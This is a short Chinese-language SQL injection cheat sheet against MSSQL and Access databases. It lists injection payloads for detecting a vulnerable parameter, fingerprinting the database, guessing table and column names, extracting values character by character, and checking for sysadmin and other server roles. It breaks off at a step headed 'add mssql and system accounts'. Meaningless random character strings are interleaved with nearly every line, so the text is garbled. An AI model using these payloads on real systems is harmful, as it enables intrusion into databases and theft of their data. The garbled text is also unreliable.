1.判断是否有注入;and 1=1 ;and 1=2 P$Fq62;}r4
2.初步判断是否是mssql ;and user>0 A k+MREG
[_1K1i"m
3.注入参数是字符'and [查询条件] and ''=' li
`Oe"s_O#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *ulkqpO
H'x)[2
5.判断数据库系统 }HxC~J"
W3]?>sLE*
;and (select count(*) from sysobjects)>0 mssql 6GsB*hW
2<TpNGXM_
;and (select count(*) from msysobjects)>0 access U$EQeb
KCi0v
gmdA1$c
nrJW.F]S8[
6.猜数据库 ;and (select Count(*) from [数据库名])>0
EzGO/uZ]
f;]C8/ W
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 j)Y68fKK
:0vKt 6>Sp
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 _&K>fy3t&
!H4C5wDu
9.(1)猜字段的ascii值(access) [=& tN)_
r@ v&~pL
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 4C`p`AQqpQ
UUDZ
(2)猜字段的ascii值(mssql) x?n13C
KpfQ=~'
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +.IncY8C$
@9\L|O'~?
10.测试权限结构(mssql) f6JC>Np
k'PN fx\K
;[! W*8.c
?.6fVSa
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 4nU+Wj?T
Ht&%`\9s
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \><v1x>;
#jT=;G7f2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- gbjql+Mx+
pXl*`[0X#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- j[Oh>yG
/<)kI(gf
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- aJSBG|IC
9
M!U@>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ]Aa.=
'I5~<"E
;and 1=(select IS_MEMBER('db_owner'));-- <gjA(xT5
v|GDPq
U{Moyj
4j}uVGi{e
11.添加mssql和系统的帐户 G&d